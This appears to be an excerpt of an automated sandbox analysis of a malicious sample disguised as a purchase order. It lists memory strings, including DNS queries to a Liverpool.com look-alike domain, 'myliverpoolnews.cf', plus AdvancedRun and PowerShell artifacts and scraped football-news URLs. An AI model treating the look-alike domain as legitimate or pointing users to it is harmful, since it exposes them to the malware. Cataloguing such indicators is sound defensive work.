                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: tracking="Footer|Liverpool FC News">Liverpool FC News</a></li><li><a href="https://www.liverpool.com/schedule/" data-link-tracking="Footer|Schedule">Schedule</a></li><li><a href="https://www.liverpool.com/liverpool-fc-news/features/" data-link-tracking="Footer|Features">Features</a></li><li><a href="https://www.liverpool.com/all-about/premier-league" data-link-tracking="Footer|Premier League">Premier League</a></li></ul><div class="social-links"><h4>Follow us<ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|bottom"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|bottom"></a></li></ul></h4></div><div class="kitemarks"><div class="ipso"></div></div><ul id="utility-links"><li><div itemprop="publisher" itemscope="itemscope" itemtype="https://schema.org/NewsMediaOrganization"><meta itemprop="publishingPrinciples" content="https://www.liverpool.com/about-us/"><meta itemprop="name" content="Liverpool.com"><meta itemprop="url" content="https://www.liverpool.com/"><div itemprop="logo" itemscope="itemscope" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://s2-prod.liverpool.com/@trinitymirrordigital/chameleon-branding/publications/liverpool/img/logo-liverpool.png"></div></div><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/rules/">Competition Rules</a></li><li><a href="https://www.liverpool.com/how-to-complain/">How to Complain</a></li><li><a href="https://www.liverpool.com/corrections-clarifications/">Corrections &amp; Clarifications</a></li><li><a href="https://www.liverpool.com/privacy-notice/">Privacy Notice</a></li><li><a href="https://www.liverpool.com"> equals www.facebook.com (Facebook)
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: tracking="Footer|Liverpool FC News">Liverpool FC News</a></li><li><a href="https://www.liverpool.com/schedule/" data-link-tracking="Footer|Schedule">Schedule</a></li><li><a href="https://www.liverpool.com/liverpool-fc-news/features/" data-link-tracking="Footer|Features">Features</a></li><li><a href="https://www.liverpool.com/all-about/premier-league" data-link-tracking="Footer|Premier League">Premier League</a></li></ul><div class="social-links"><h4>Follow us<ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|bottom"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|bottom"></a></li></ul></h4></div><div class="kitemarks"><div class="ipso"></div></div><ul id="utility-links"><li><div itemprop="publisher" itemscope="itemscope" itemtype="https://schema.org/NewsMediaOrganization"><meta itemprop="publishingPrinciples" content="https://www.liverpool.com/about-us/"><meta itemprop="name" content="Liverpool.com"><meta itemprop="url" content="https://www.liverpool.com/"><div itemprop="logo" itemscope="itemscope" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://s2-prod.liverpool.com/@trinitymirrordigital/chameleon-branding/publications/liverpool/img/logo-liverpool.png"></div></div><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/rules/">Competition Rules</a></li><li><a href="https://www.liverpool.com/how-to-complain/">How to Complain</a></li><li><a href="https://www.liverpool.com/corrections-clarifications/">Corrections &amp; Clarifications</a></li><li><a href="https://www.liverpool.com/privacy-notice/">Privacy Notice</a></li><li><a href="https://www.liverpool.com"> equals www.twitter.com (Twitter)
                      Source: unknownDNS traffic detected: queries for: myliverpoolnews.cf
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289217407.00000000024B6000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
                      Source: 08042021New-PurchaseOrder.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                      Source: 08042021New-PurchaseOrder.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.34.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.34.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289217407.00000000024B6000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
                      Source: 08042021New-PurchaseOrder.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                      Source: 08042021New-PurchaseOrder.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289217407.00000000024B6000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
                      Source: 08042021New-PurchaseOrder.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: 08042021New-PurchaseOrder.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.34.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.34.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                      Source: 77EC63BDA74BD0D0E0426DC8F8008506.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289004611.0000000002471000.00000004.00000001.sdmpString found in binary or memory: http://myliverpoolnews.cf
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289004611.0000000002471000.00000004.00000001.sdmpString found in binary or memory: http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289217407.00000000024B6000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: 08042021New-PurchaseOrder.exeString found in binary or memory: http://ocsp.digicert.com0C
                      Source: 08042021New-PurchaseOrder.exeString found in binary or memory: http://ocsp.digicert.com0O
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.34.drString found in binary or memory: http://ocsp.sectigo.com0
                      Source: powershell.exe, 00000008.00000003.374847695.00000000075F3000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000003.355318140.0000000007E70000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/BreadcrumbList
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/ListItem
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/NewsArticle
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289004611.0000000002471000.00000004.00000001.sdmp, SWqTT.exe, 00000020.00000002.484366830.0000000005117000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000008.00000003.374847695.00000000075F3000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000003.355318140.0000000007E70000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: 08042021New-PurchaseOrder.exeString found in binary or memory: http://www.digicert.com/CPS0
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289217407.00000000024B6000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/CPS0v
                      Source: powershell.exe, 00000008.00000003.391009899.0000000008E79000.00000004.00000001.sdmpString found in binary or memory: http://www.microsoft.co
                      Source: AdvancedRun.exe, AdvancedRun.exe, 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000023.00000000.377976496.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000025.00000000.411827266.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000026.00000000.421152625.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.34.drString found in binary or memory: http://www.nirsoft.net/
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://ads.pubmatic.com/AdServer/js/pwt/156997/3236/pwt.js
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://c.amazon-adsystem.com/aax2/apstag.js
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://felix.data.tm-awx.com/ampconfig.json&quot;
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://felix.data.tm-awx.com/felix.min.js
                      Source: powershell.exe, 00000008.00000003.374847695.00000000075F3000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000003.355318140.0000000007E70000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article17156435.ece/ALTERNATES/s615/1_GettyImages-1183794835.
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article17166876.ece/ALTERNATES/s615/0_GettyImages-1175998874.
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-02-
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-02
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s270b/0_WhatsApp-Image-2021-02
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s220b/0_Salah-Pressing.jpg
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s270b/0_Salah-Pressing.jpg
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s615/0_Salah-Pressing.jpg
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s180/0_Curtis-10.png
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.png
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s180/0_Salah-Goal-vs-Leeds.jpg
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s220b/0_Salah-Goal-vs-Leeds.jp
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s615/0_Salah-Goal-vs-Leeds.jpg
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s220b/0_RobertsonCross1.jpg
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s270b/0_RobertsonCross1.jpg
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s180/0_GettyImages-1231353837.
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s220b/0_GettyImages-1231353837
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s270b/0_GettyImages-1231353837
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s180/0_GettyImages-1304940818.
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818.
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s180/1_FreeAgentPlayers.jpg
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s615/1_FreeAgentPlayers.jpg
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s180/0_GettyImages-1273716690.
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-1273716690
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-1273716690
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s458/0_GettyImages-1273716690.
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s615/0_GettyImages-1273716690.
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s458/0_GettyImages-1302496803.
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s615/0_GettyImages-1302496803.
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s458/1_WhatsApp-Image-2021-03-
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s615/1_WhatsApp-Image-2021-03-
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-11837
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpoolecho.co.uk/incoming/article17172788.ece/ALTERNATES/s1200/1_GettyImages-1178
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://mab.data.tm-awx.com/rhs&quot;
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmpString found in binary or memory: https://myliverpoolnews.cf4
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://reach-id.orbit.tm-awx.com/analytics.js.gz
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://reachplc.hub.loginradius.com&quot;
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://s2-prod.liverpool.com/
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://s2-prod.mirror.co.uk/
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.34.drString found in binary or memory: https://sectigo.com/CPS0C
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.34.drString found in binary or memory: https://sectigo.com/CPS0D
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://securepubads.g.doubleclick.net/tag/js/gpt.js
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://static.hotjar.com/c/hotjar-
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://trinitymirror.grapeshot.co.uk/
                      Source: 08042021New-PurchaseOrder.exeString found in binary or memory: https://www.digicert.com/CPS0
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-M3TH25P
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.co
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/andrew-robertson
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/champions-league
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/curtis-jones
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/georginio-wijnaldum
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/mohamed-salah
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/ozan-kabak
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/premier-league
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/sadio-mane
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/steven-gerrard
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/transfers
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-1996166
